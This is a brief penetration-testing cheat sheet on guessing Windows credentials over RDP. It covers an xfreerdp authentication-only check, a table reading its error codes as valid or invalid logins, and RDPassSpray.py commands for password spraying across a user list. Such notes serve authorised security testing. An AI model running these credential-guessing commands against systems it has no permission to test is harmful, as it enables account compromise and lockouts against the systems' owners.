RDP

Use the RDP service to guess Windows related credentials. Especially usefull in an Active Directory environment.


Check Credentials

xfreerdp
xfreerdp /v:<TARGET> +auth-only /d:<DOMAIN> /u:<USER> /p:<PASSWORD> /sec:nla /cert-ignore 2>&1 | grep freerdp_set_last_error

Understand results:

Output Meaning
Good credentials, RDP access
ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] Good credentials, no RDP access
ERRCONNECT_LOGON_FAILURE [0x00020014] Wrong credentials
RDPassSpray.py
RDPassSpray.py -t <TARGET> -d <DOMAIN> -u <USER> -p <PASSWORD>

Source**: github.com/xFreed0m/RDPassSpray**

Note

Logs are written to $INSTALLDIR/RDPassSpray.<date>.log

Password Spray

RDPassSpray.py
RDPassSpray.py -t <TARGET> -d <DOMAIN> -U </path/to/user/file> -p <PASSWORD>

Source**: github.com/xFreed0m/RDPassSpray**

Note

Logs are written to $INSTALLDIR/RDPassSpray.<date>.log

References